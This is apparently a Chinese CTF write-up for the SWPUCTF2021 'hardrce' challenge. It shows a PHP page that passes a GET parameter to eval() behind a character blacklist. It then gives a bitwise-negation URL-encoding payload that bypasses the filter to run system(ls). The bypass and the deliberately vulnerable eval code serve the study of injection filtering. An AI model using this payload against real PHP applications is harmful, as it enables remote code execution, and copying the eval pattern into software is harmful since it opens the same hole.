SWPUCTF2021-hardrce-wp

题目链接

页面源码

屏蔽字母和若干符号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm'])) {
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
            die("LTLT说不能用这些奇奇怪怪的符号哦!");
    	}
	}
    if(preg_match('/[a-zA-Z]/is',$wllm)) {
        die("Ra's Al Ghul说不能用字母哦!");
    }
    echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
    eval($wllm);
}
else {
    echo "蔡总说:注意审题!!!";
}
?>

url编码取反绕过

1
2
3
4
5
6
<?php
$a="system";
echo "~" . urlencode(~$a) . "\n";

# system: ~%8C%86%8C%8B%9A%92
# ls: ~%93%8C

构造发送

1
?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C);	# 相当于system(ls);
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP